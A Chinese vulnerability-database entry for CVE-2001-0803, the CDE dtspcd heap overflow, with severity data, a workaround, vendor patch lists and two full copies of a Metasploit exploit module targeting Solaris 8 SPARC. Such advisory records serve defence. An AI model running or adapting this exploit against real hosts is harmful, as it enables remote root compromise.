CVE-2001-0803
CVSS10.0
发布时间 :2001-12-06 00:00:00
修订时间 :2008-09-05 00:00:00
NMCOEPS    

[原文]Buffer overflow in the client connection routine of libDtSvc.so.1 in CDE Subprocess Control Service (dtspcd) allows remote attackers to execute arbitrary commands.


[CNNVD]Sun Solaris CDE dtspcd远程缓冲区溢出漏洞(CNNVD-200112-068)

        
        通用桌面环境(CDE)是一个可在UNIX和Linux操作系统中运行的综合的图形用户界面。 CDE子进程控制服务(dtspcd)是一个从客户端接收请求,远程执行命令和启动应用程序的网络守护程序。在使用CDE的系统中,dtspcd是由互联网服务守护程序(一般是inetd或xinetd)根据CDE客户端请求而生成的。dtspcd的典型配置为以root权限在TCP/6112端口运行。
        dtspcd实现上存在一个缓冲区溢出漏洞,远程攻击者可以通过溢出攻击在主机上以root用户的权限执行任意指令,从而完全控制主机。
        dtspcd使用的一个共享库中含有一个可以远程利用的缓冲区溢出漏洞。在客户端协商过程中,dtspcd从客户端接收一个长度值和其他数据,但是没有正确地进行输入有效性检查。因此,恶意客户端可以构造并向dtspcd发送畸形数据,触发缓冲区溢出,并可能以root权限执行任意代码。
        

- CVSS (基础分值)

CVSS分值: 10 [严重(HIGH)]
机密性影响: COMPLETE [完全的信息泄露导致所有系统文件暴露]
完整性影响: COMPLETE [系统完整性可被完全破坏]
可用性影响: COMPLETE [可能导致系统完全宕机]
攻击复杂度: LOW [漏洞利用没有访问限制 ]
攻击向量: [--]
身份认证: NONE [漏洞利用无需身份认证]

- CWE (弱点类目)

CWE-119 [内存缓冲区边界内操作的限制不恰当]

- CPE (受影响的平台与产品)

cpe:/a:open_group:cde_common_desktop_environment:2.0
cpe:/a:open_group:cde_common_desktop_environment:2.1
cpe:/a:open_group:cde_common_desktop_environment:1.0.1
cpe:/a:open_group:cde_common_desktop_environment:1.0.2
cpe:/a:open_group:cde_common_desktop_environment:1.2
cpe:/a:open_group:cde_common_desktop_environment:1.1

- OVAL (用于检测的技术细节)

oval:org.mitre.oval:def:74Solaris 7 CDE dtspcd Buffer Overflow
oval:org.mitre.oval:def:70Solaris 8 CDE dtspcd Buffer Overflow
*OVAL详细的描述了检测该漏洞的方法,你可以从相关的OVAL定义中找到更多检测该漏洞的技术细节。

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-0803
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2001-0803
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200112-068
(官方数据源) CNNVD

- 其它链接及资源

http://www.kb.cert.org/vuls/id/172583
(VENDOR_ADVISORY)  CERT-VN  VU#172583
http://www.cert.org/advisories/CA-2002-01.html
(UNKNOWN)  CERT  CA-2002-01
http://www.cert.org/advisories/CA-2001-31.html
(UNKNOWN)  CERT  CA-2001-31
http://www.securityfocus.com/bid/3517
(VENDOR_ADVISORY)  BID  3517
http://www.securityfocus.com/advisories/3651
(VENDOR_ADVISORY)  HP  HPSBUX0111-175
http://xforce.iss.net/static/7396.php
(UNKNOWN)  XF  cde-dtspcd-bo(7396)
http://xforce.iss.net/alerts/advise101.php
(VENDOR_ADVISORY)  ISS  20011112 Multi-Vendor Buffer Overflow Vulnerability in CDE Subprocess Control Service
http://sunsolve.sun.com/pub-cgi/retrieve.pl?doctype=coll&doc=secbull/214
(UNKNOWN)  SUN  00214
http://ftp.support.compaq.com/patches/.new/html/SSRT-541.shtml
(UNKNOWN)  COMPAQ  SSRT541
ftp://stage.caldera.com/pub/security/openunix/CSSA-2001-SCO.30/
(UNKNOWN)  CALDERA  CSSA-2001-SCO.30
ftp://patches.sgi.com/support/free/security/advisories/20011107-01-P
(UNKNOWN)  SGI  20011107-01-P

- 漏洞信息

Sun Solaris CDE dtspcd远程缓冲区溢出漏洞
危急 边界条件错误
2001-12-06 00:00:00 2006-11-13 00:00:00
远程  
        
        通用桌面环境(CDE)是一个可在UNIX和Linux操作系统中运行的综合的图形用户界面。 CDE子进程控制服务(dtspcd)是一个从客户端接收请求,远程执行命令和启动应用程序的网络守护程序。在使用CDE的系统中,dtspcd是由互联网服务守护程序(一般是inetd或xinetd)根据CDE客户端请求而生成的。dtspcd的典型配置为以root权限在TCP/6112端口运行。
        dtspcd实现上存在一个缓冲区溢出漏洞,远程攻击者可以通过溢出攻击在主机上以root用户的权限执行任意指令,从而完全控制主机。
        dtspcd使用的一个共享库中含有一个可以远程利用的缓冲区溢出漏洞。在客户端协商过程中,dtspcd从客户端接收一个长度值和其他数据,但是没有正确地进行输入有效性检查。因此,恶意客户端可以构造并向dtspcd发送畸形数据,触发缓冲区溢出,并可能以root权限执行任意代码。
        

- 公告与补丁

        临时解决方法:
        如果您不能立刻安装补丁或者升级,CNNVD建议您采取以下措施以降低威胁:
        * 禁止'dtspcd'服务。以Solaris系统为例:
         1. 转变成root用户
         $ su -
         #
        
        2. 关闭dtspcd服务
         使用您熟悉的编辑器打开/etc/inetd.conf文件,找到如下行:
         dtspc stream tcp nowait root /usr/dt/bin/dtspcd /usr/dt/bin/dtspcd
         在该行的开始处增加"#"号来将其注释:
         #dtspc stream tcp nowait root /usr/dt/bin/dtspcd /usr/dt/bin/dtspcd
         保存修改,退出编辑器。
        
        3. 禁止dtspcd的执行权限
         # chmod 000 /usr/dt/bin/dtspcd
        4. 重新启动inetd
        
         # ps -ef|grep inetd
         root 167 1 0 Oct 07 ? 0:07 /usr/sbin/inetd -s -t
         # kill -HUP 167 (上面的例子中,167是inetd的pid)
        其他操作系统可以参考上述步骤。
        厂商补丁:
        Caldera
        -------
        Caldera已经为此发布了一个安全公告(CSSA-2001-SCO.30)以及相应补丁:
        CSSA-2001-SCO.30:Open UNIX, UnixWare 7: DCE SPC library buffer overflow
        链接:ftp://stage.caldera.com/pub/security/openunix/CSSA-2001-SCO.30/
        补丁下载:
        Caldera UnixWare 7:
        Caldera Patch erg711881.Z
        ftp://stage.caldera.com/pub/security/openunix/CSSA-2001-SCO.30/erg711881.Z
        Caldera OpenUnix 8.0:
        Caldera Patch erg711881.Z
        ftp://stage.caldera.com/pub/security/openunix/CSSA-2001-SCO.30/erg711881.Z
        HP
        --
        HP已经为此发布了一个安全公告(HPSBUX0111-175)以及相应补丁:
        HPSBUX0111-175:Buffer overflow in dtspcd
        补丁下载:
         10.10 PHSS_25785
         10.20 PHSS_25786
         10.24 PHSS_26029
         11.00 PHSS_25787
         11.04 PHSS_26030
         11.11 PHSS_25788
        您可以在HP的ftp站下载上述补丁:
        [url]ftp://us-ffs.external.hp.com/hp-ux_patches[/url]
        补丁安装方法:
         1. 在安装补丁之前备份系统。
         2. 以root身份登录。
        
         3. 把patch复制到/tmp目录。
        
         4. 转到/tmp目录unshar补丁程序:
        
         cd /tmp
         sh PHCO_25107
        
         5a. 对一个单独的系统,运行swinstall来安装补丁:
        
         swinstall -x autoreboot=true -x match_target=true \
         -s /tmp/PHCO_xxxxx.depot
        
         默认情况下会把原来的软件备份到/var/adm/sw/patch/PHCO_xxxxx目录下。如果你不希望保留一个备份,可以创建一个空文件/var/adm/sw/patch/PATCH_NOSAVE,这样系统就不会再保留备份了。
        
         警告:当安装补丁的时候这个文件存在,补丁安装以后就不能卸载了,使用这个功能的时候必须小心。
        IBM
        ---
        IBM已经为此发布了一个安全公告(IBM-20011029-01)以及相应补丁:
        IBM-20011029-01:Buffer oveflow vulnerability in CDE DtSvc library
        补丁下载:
        IBM已经为此发布了两个APAR补丁以及一个紧急安全补丁:
        AIX 4.3 APAR IY25436
        AIX 5.1 APAR IY25437
        紧急安全补丁名为:"CDE_dtspcd_efix.tar.Z",可以从下列地址下载:
        ftp://aix.software.ibm.com/aix/efixes/security/
        Open Group
        ----------
        目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
        
        http://www.opengroup.org/cde/

        SGI
        ---
        SGI已经为此发布了一个安全公告(20011107-01-P)以及相应补丁:
        20011107-01-P:CDE vulnerabilities
        链接:ftp://patches.sgi.com/support/free/security/advisories/20011107-01-P
        补丁下载:
        SGI已经针对CDE提供了补丁:4416 ,可以应用于IRIX 6.5-6.5.14系统上。
        上述补丁可以在下列地址下载:
        ftp://patches.sgi.com/support/free/security/patches/
        Sun
        ---
        Sun已经为此发布了一个安全公告(Sun-00214)以及相应补丁:
        Sun-00214:dtspcd
        链接:
        http://sunsolve.sun.com/pub-cgi/retrieve.pl?doctype=coll&doc=secbull/214&type=0&nav=sec.sba

        补丁下载:
         OS Version Patch ID
         __________ _________
         SunOS 5.8 108949-07
         SunOS 5.8_x86 108950-07
         SunOS 5.7 106934-04
         SunOS 5.7_x86 106935-04
         SunOS 5.6 105669-11
         SunOS 5.6_x86 105670-10
         SunOS 5.5.1 108363-02
         SunOS 5.5.1_x86 108364-02
        您可以使用下列链接来下载相应补丁:
        
        http://sunsolve.sun.com/pub-cgi/patchDownload.pl?target=<补丁ID>&method=h

        例如,对于代号为111596-02的补丁,您可以使用下列链接:
        
        http://sunsolve.sun.com/pub-cgi/patchDownload.pl?target=111596&method=h

        补丁安装方法:
        1. 首先用unzip或者uncompress命令将补丁包解压缩
        2. 然后使用patchadd 命令安装补丁,例如:
        
         #patchadd /var/spool/patch/104945-02
        
         假设要安装的补丁号是104945-02, 解压之后的目录在:"/var/spool/patch/104945-02"
        Xi Graphics
        -----------
        目前厂商已经为此提供了一个安全补丁,您可以在下列地址获取相关说明和补丁:
        ftp://ftp.xig.com/updates/dextop/2.1/DEX2100.012.txt
        ftp://ftp.xig.com/updates/dextop/2.1/DEX2100.012.tar.gz

- 漏洞信息 (16323)

Solaris dtspcd Heap Overflow (EDBID:16323)
solaris/sparc remote
2010-04-30 Verified
0 metasploit
N/A [点击下载]
##
# $Id: heap_noir.rb 9179 2010-04-30 08:40:19Z jduck $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
	Rank = GreatRanking

	include Msf::Exploit::Remote::Tcp

	def initialize(info = {})
		super(update_info(info,
			'Name'           => 'Solaris dtspcd Heap Overflow',
			'Description'    => %q{
					This is a port of noir's dtspcd exploit. This module should
				work against any vulnerable version of Solaris 8 (sparc).
				The original exploit code was published in the book
				Shellcoder's Handbook.
			},
			'Author'         => [ 'noir <noir@uberhax0r.net>', 'hdm' ],
			'License'        => MSF_LICENSE,
			'Version'        => '$Revision: 9179 $',
			'References'     =>
				[
					[ 'CVE', '2001-0803'],
					[ 'OSVDB', '4503'],
					[ 'BID', '3517'],
					[ 'URL', 'http://www.cert.org/advisories/CA-2001-31.html'],
					[ 'URL', 'http://media.wiley.com/product_ancillary/83/07645446/DOWNLOAD/Source_Files.zip'],

				],
			'Privileged'     => true,
			'Payload'        =>
				{
					'Space'    => 800,
					'BadChars' => "\x00\x0d",
					'PrependEncoder' => ("\xa4\x1c\x40\x11" * 3),
				},
			'Platform'       => 'solaris',
			'Arch'           => ARCH_SPARC,
			'Targets'        =>
				[
					['Solaris 8',
						{ 'Rets' =>
							[0xff3b0000, 0x2c000, 0x2f000, 0x400, [ 0x321b4, 0x361d8, 0x361e0, 0x381e8 ] ]
						}
					],
				],
			'DisclosureDate' => 'Jul 10 2002',
			'DefaultTarget' => 0))

		register_options(
			[
				Opt::RPORT(6112)
			], self.class)
	end


	def exploit
		return if not dtspcd_uname()

		target['Rets'][4].each do |tjmp|

			rbase = target['Rets'][1]

			while (rbase < target['Rets'][2]) do
				break if session_created?
				begin
					print_status(sprintf("Trying 0x%.8x 0x%.8x...", target['Rets'][0] + tjmp, rbase))
					attack(target['Rets'][0] + tjmp, rbase, payload.encoded)
					break if session_created?

					attack(target['Rets'][0] + tjmp, rbase + 4, payload.encoded)
					rbase += target['Rets'][3]
				rescue EOFError
				end
			end
		end

		handler
		disconnect
	end

	def check
		return Exploit::CheckCode::Detected if dtspcd_uname()
		return Exploit::CheckCode::Safe
	end

	def dtspcd_uname
		spc_connect()
		spc_write(spc_register('root', "\x00"), 4)
		host, os, ver, arch = spc_read().gsub("\x00", '').split(':')

		return false if not host

		print_status("Detected dtspcd running #{os} v#{ver} on #{arch} hardware")
		spc_write("", 2)
		return true
	end


	def chunk_create(retloc, retadd)
		"\x12\x12\x12\x12" +
		[retadd].pack('N')+
		"\x23\x23\x23\x23\xff\xff\xff\xff" +
		"\x34\x34\x34\x34\x45\x45\x45\x45" +
		"\x56\x56\x56\x56" +
		[retloc - 8].pack('N')
	end


	def attack(retloc, retadd, fcode)
		spc_connect()

		begin
			buf = ("\xa4\x1c\x40\x11\x20\xbf\xff\xff"  * ((4096 - 8 - fcode.length) / 8)) + fcode
			buf << "\x00\x00\x10\x3e\x00\x00\x00\x14"
			buf << "\x12\x12\x12\x12\xff\xff\xff\xff"
			buf << "\x00\x00\x0f\xf4"
			buf << chunk_create(retloc, retadd)
			buf << "X" * ((0x103e - 8) - buf.length)

			spc_write(spc_register("", buf), 4)

			handler

		rescue EOFError
		end
	end


	def spc_register(user='', buff='')
		"4 \x00#{user}\x00\x0010\x00#{buff}"
	end

	def spc_write(buff = '', cmd='')
		sock.put(sprintf("%08x%02x%04x%04x  %s", 2, cmd, buff.length, (@spc_seq += 1), buff))
	end

	def spc_read
		# Bytes: 0-9 = channel, 9-10 = cmd, 10-13 = mbl, 14-17 = seq
		head = sock.get_once(20)
		sock.get_once( head[10, 13].hex ) || ''
	end

	def spc_connect
		disconnect
		connect
		@spc_seq = 0
	end

end
		

- 漏洞信息 (F82312)

Solaris dtspcd Heap Overflow (PacketStormID:F82312)
2009-10-28 00:00:00
noir  metasploit.com
exploit,shellcode
solaris
CVE-2001-0803
[点击下载]

This is a port of noir's dtspcd exploit. This Metasploit module should work against any vulnerable version of Solaris 8 (sparc). The original exploit code was published in the book Shellcoder's Handbook.

##
# $Id$
##

##
# This file is part of the Metasploit Framework and may be subject to 
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##


require 'msf/core'


class Metasploit3 < Msf::Exploit::Remote

	include Msf::Exploit::Remote::Tcp

	def initialize(info = {})
		super(update_info(info,	
			'Name'           => 'Solaris dtspcd Heap Overflow',
			'Description'    => %q{
				This is a port of noir's dtspcd exploit. This module should
				work against any vulnerable version of Solaris 8 (sparc).
				The original exploit code was published in the book
				Shellcoder's Handbook.
					
			},
			'Author'         => [ 'noir <noir@uberhax0r.net>', 'hdm' ],
			'License'        => MSF_LICENSE,
			'Version'        => '$Revision$',
			'References'     =>
				[
					[ 'CVE', '2001-0803'],
					[ 'OSVDB', '4503'],
					[ 'BID', '3517'],
					[ 'URL', 'http://www.cert.org/advisories/CA-2001-31.html'],
					[ 'URL', 'http://media.wiley.com/product_ancillary/83/07645446/DOWNLOAD/Source_Files.zip'],

				],
			'Privileged'     => true,
			'Payload'        =>
				{
					'Space'    => 800,
					'BadChars' => "\x00\x0d",
					'PrependEncoder' => ("\xa4\x1c\x40\x11" * 3),
				},
			'Platform'       => 'solaris',
			'Arch'           => ARCH_SPARC,
			'Targets'        => 
				[
					['Solaris 8', 
						{ 'Rets' =>
							[0xff3b0000, 0x2c000, 0x2f000, 0x400, [ 0x321b4, 0x361d8, 0x361e0, 0x381e8 ] ]
						}
					],
				],
			'DisclosureDate' => 'Jul 10 2002',
			'DefaultTarget' => 0))
			
			register_options(
				[
					Opt::RPORT(6112)
				], self.class)
	end


	def exploit
		return if not dtspcd_uname()
		
		target['Rets'][4].each do |tjmp|
			
			rbase = target['Rets'][1]
			
			while (rbase < target['Rets'][2]) do 
				break if session_created?
				begin
					print_status(sprintf("Trying 0x%.8x 0x%.8x...", target['Rets'][0] + tjmp, rbase))
					attack(target['Rets'][0] + tjmp, rbase, payload.encoded)
					break if session_created?
					
					attack(target['Rets'][0] + tjmp, rbase + 4, payload.encoded)
					rbase += target['Rets'][3]
				rescue EOFError
				end
			end
		end
		
		handler
		disconnect
	end
	
	def check
		return Exploit::CheckCode::Detected if dtspcd_uname()
		return Exploit::CheckCode::Safe
	end
	
	def dtspcd_uname
		spc_connect()
		spc_write(spc_register('root', "\x00"), 4)
		host, os, ver, arch = spc_read().gsub("\x00", '').split(':')
		
		return false if not host
		
		print_status("Detected dtspcd running #{os} v#{ver} on #{arch} hardware")
		spc_write("", 2)
		return true
	end


	def chunk_create(retloc, retadd)
		"\x12\x12\x12\x12" +
		[retadd].pack('N')+
		"\x23\x23\x23\x23\xff\xff\xff\xff" +
		"\x34\x34\x34\x34\x45\x45\x45\x45" +
		"\x56\x56\x56\x56" +
		[retloc - 8].pack('N')
	end


	def attack(retloc, retadd, fcode)
		spc_connect()
		
		begin
			buf = ("\xa4\x1c\x40\x11\x20\xbf\xff\xff"  * ((4096 - 8 - fcode.length) / 8)) + fcode
			buf << "\x00\x00\x10\x3e\x00\x00\x00\x14"
			buf << "\x12\x12\x12\x12\xff\xff\xff\xff"
			buf << "\x00\x00\x0f\xf4"
			buf << chunk_create(retloc, retadd)
			buf << "X" * ((0x103e - 8) - buf.length)

			spc_write(spc_register("", buf), 4)
			
			handler
			
		rescue EOFError
		rescue => e
			$stderr.puts "Error: #{e} #{e.class}"
		end
					
		
	end
	

	def spc_register(user='', buff='')
		"4 \x00#{user}\x00\x0010\x00#{buff}"
	end
	
	def spc_write(buff = '', cmd='')
		sock.put(sprintf("%08x%02x%04x%04x  %s", 2, cmd, buff.length, (@spc_seq += 1), buff))
	end
	
	def spc_read
		# Bytes: 0-9 = channel, 9-10 = cmd, 10-13 = mbl, 14-17 = seq
		head = sock.get_once(20)
		sock.get_once( head[10, 13].hex ) || ''
	end

	def spc_connect
		disconnect
		connect
		@spc_seq = 0
	end

end

    

- 漏洞信息

4503
CDE Subprocess Control Service (dtspcd) libDtSvc.so.1 Remote Overflow
Remote / Network Access Input Manipulation
Loss of Integrity
Exploit Public, Exploit Commercial

- 漏洞描述

A remote overflow exists in CDE dtspcd. dtspcd fails to perform proper bounds checking within 'libDtSvc' resulting in a buffer overflow. With a specially crafted request, an attacker can cause arbitrary code execution resulting in a loss of integrity.

- 时间线

2002-07-10 Unknow
2002-07-10 Unknow

- 解决方案

Currently, there are no known workarounds to correct this issue. However, each respective vendor has released a patch and/or new software versions to address this vulnerability.

- 相关参考

- 漏洞作者

- 漏洞信息

Multiple Vendor CDE dtspcd Buffer Overflow Vulnerability
Boundary Condition Error 3517
Yes No
2001-11-06 12:00:00 2007-11-05 03:25:00
This vulnerability was originally discovered by Chris Spencer of the ISS X-Force.

- 受影响的程序版本

Xi Graphics Maximum CDE 1.2.3
Xi Graphics DeXtop 2.1
Sun Solaris 2.5.1 _x86
Sun Solaris 2.5.1 _ppc
Sun Solaris 2.5.1
Sun Solaris 8_x86
Sun Solaris 8_sparc
Sun Solaris 7.0_x86
Sun Solaris 7.0
Sun Solaris 2.6_x86
Sun Solaris 2.6
Sun Solaris 2.5_x86
Sun Solaris 2.5
Sun Solaris 2.4_x86
Sun Solaris 2.4
SGI IRIX 6.5.13
SGI IRIX 6.5.12
SGI IRIX 6.5.11
SGI IRIX 6.5.10
SGI IRIX 6.5.9
SGI IRIX 6.5.8
SGI IRIX 6.5.7
SGI IRIX 6.5.6
SGI IRIX 6.5.5
SGI IRIX 6.5.4
SGI IRIX 6.5.3
SGI IRIX 6.5.2
SGI IRIX 6.5.1
SGI IRIX 6.5
SGI IRIX 6.4
SGI IRIX 6.3
SGI IRIX 6.2
SGI IRIX 6.1
Open Group CDE Common Desktop Environment 2.1
+ Sun Solaris 9_x86 Update 2
+ Sun Solaris 9_x86
+ Sun Solaris 9
Open Group CDE Common Desktop Environment 2.0
Open Group CDE Common Desktop Environment 1.2
Open Group CDE Common Desktop Environment 1.1
Open Group CDE Common Desktop Environment 1.0.2
Open Group CDE Common Desktop Environment 1.0.1
IBM AIX 4.3.3
IBM AIX 4.3.2
IBM AIX 4.3.1
IBM AIX 4.3
IBM AIX 4.2.1
IBM AIX 4.2
IBM AIX 4.1.5
IBM AIX 4.1.4
IBM AIX 4.1.3
IBM AIX 4.1.2
IBM AIX 4.1.1
IBM AIX 4.1
IBM AIX 4.0
IBM AIX 5.1
HP HP-UX (VVOS) 11.0.4
HP HP-UX (VVOS) 11.0 4
HP HP-UX (VVOS) 10.24
HP HP-UX 11.11
HP HP-UX 11.0
HP HP-UX 10.20
HP HP-UX 10.10
Compaq Tru64 5.1 a
Compaq Tru64 5.1
Compaq Tru64 5.0 a
Compaq Tru64 5.0
Compaq Tru64 4.0 g
Compaq Tru64 4.0 f
Caldera UnixWare 7
Caldera OpenUnix 8.0

- 漏洞讨论

CDE is a Motif-based graphical user environment for UNIX systems. It is shipped with a number of commercial systems.

A buffer-overflow vulnerability in the 'dtspcd' component may allow a remote attacker to gain administrative privileges on the affected host. The overflow is believed to be in the libDtSvc library, which used by the 'Subprocess Control Service'. The overflow is exploitable through the 'dtspcd' service,a server utility that facilitates remote invocation of CDE utilities and commands. The 'dtspcd' service listens on TCP port 6112, runs with root privileges, and is enabled by default (through 'inetd') on many systems.

- 漏洞利用

UPDATE: Core Security Technologies has developed a working commercial exploit for its CORE IMPACT product. This exploit is not otherwise publicly available or known to be circulating in the wild.

There is information from a highly credible source that an exploit for this vulnerability is currently in use in the wild.

An exploit has been released as part of the MetaSploit Framework 2.3.

- 解决方案

Vendor fixes are available. Please see the references for details.


Sun Solaris 8_sparc

IBM AIX 5.1

Sun Solaris 2.6

Caldera UnixWare 7

Sun Solaris 2.6_x86

Sun Solaris 7.0

Sun Solaris 7.0_x86

Sun Solaris 8_x86

HP HP-UX 10.10
  • HP PHSS_25785
    http://itrc.hp.com

  • HP Temporary Hotfix: dtspcd.tar.gz
    To install this emergency hotfix,download the archive and place it in a protected directory. Verify the integrity of the archive:MD5 Sum: b122f84857f4da65b50d9926201608a1Unpack it, and run 'install_dtspcd x'Where 'x' is either:dtspcd.10.10dtspcd.10.20dtspcd.11.00dtspcd.11.11The value chosen depends
    ftp://dtspcd:dtspcd@hprc.external.hp.com/dtspcd.tar.gz


HP HP-UX 10.20
  • HP PHSS_25786
    http://itrc.hp.com

  • HP Temporary Hotfix: dtspcd.tar.gz
    To install this emergency hotfix,download the archive and place it in a protected directory. Verify the integrity of the archive:MD5 Sum: b122f84857f4da65b50d9926201608a1Unpack it, and run 'install_dtspcd x'Where 'x' is either:dtspcd.10.10dtspcd.10.20dtspcd.11.00dtspcd.11.11The value chosen depends
    ftp://dtspcd:dtspcd@hprc.external.hp.com/dtspcd.tar.gz


HP HP-UX (VVOS) 10.24

HP HP-UX 11.0
  • HP PHSS_25787
    http://itrc.hp.com

  • HP PHSS_27869
    http://itrc.hp.com

  • HP Temporary Hotfix: dtspcd.tar.gz
    To install this emergency hotfix,download the archive and place it in a protected directory. Verify the integrity of the archive:MD5 Sum: b122f84857f4da65b50d9926201608a1Unpack it, and run 'install_dtspcd x'Where 'x' is either:dtspcd.10.10dtspcd.10.20dtspcd.11.00dtspcd.11.11The value chosen depends
    ftp://dtspcd:dtspcd@hprc.external.hp.com/dtspcd.tar.gz


HP HP-UX (VVOS) 11.0 4

HP HP-UX (VVOS) 11.0.4
  • HP Temporary Hotfix: dtspcd.tar.gz
    To install this emergency hotfix,download the archive and place it in a protected directory. Verify the integrity of the archive:MD5 Sum: b122f84857f4da65b50d9926201608a1Unpack it, and run 'install_dtspcd x'Where 'x' is either:dtspcd.10.10dtspcd.10.20dtspcd.11.00dtspcd.11.11The value chosen depends
    ftp://dtspcd:dtspcd@hprc.external.hp.com/dtspcd.tar.gz


HP HP-UX 11.11
  • HP PHSS_25788
    http://itrc.hp.com

  • HP Temporary Hotfix: dtspcd.tar.gz
    To install this emergency hotfix,download the archive and place it in a protected directory. Verify the integrity of the archive:MD5 Sum: b122f84857f4da65b50d9926201608a1Unpack it, and run 'install_dtspcd x'Where 'x' is either:dtspcd.10.10dtspcd.10.20dtspcd.11.00dtspcd.11.11The value chosen depends
    ftp://dtspcd:dtspcd@hprc.external.hp.com/dtspcd.tar.gz


Xi Graphics DeXtop 2.1

Sun Solaris 2.5.1 _x86

Sun Solaris 2.5.1

Compaq Tru64 4.0 f

Compaq Tru64 4.0 g

IBM AIX 4.1
  • IBM IX89806


IBM AIX 4.2
  • IBM IX89893


IBM AIX 4.3
  • IBM IX89419


IBM AIX 4.3.3
  • IBM IY06694


Compaq Tru64 5.0 a

Compaq Tru64 5.1 a

Compaq Tru64 5.1

SGI IRIX 6.5

SGI IRIX 6.5.1

SGI IRIX 6.5.10

SGI IRIX 6.5.11

SGI IRIX 6.5.12

SGI IRIX 6.5.13

SGI IRIX 6.5.2

SGI IRIX 6.5.3

SGI IRIX 6.5.4

SGI IRIX 6.5.5

SGI IRIX 6.5.6

SGI IRIX 6.5.7

SGI IRIX 6.5.8

SGI IRIX 6.5.9

Caldera OpenUnix 8.0

- 相关参考

 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站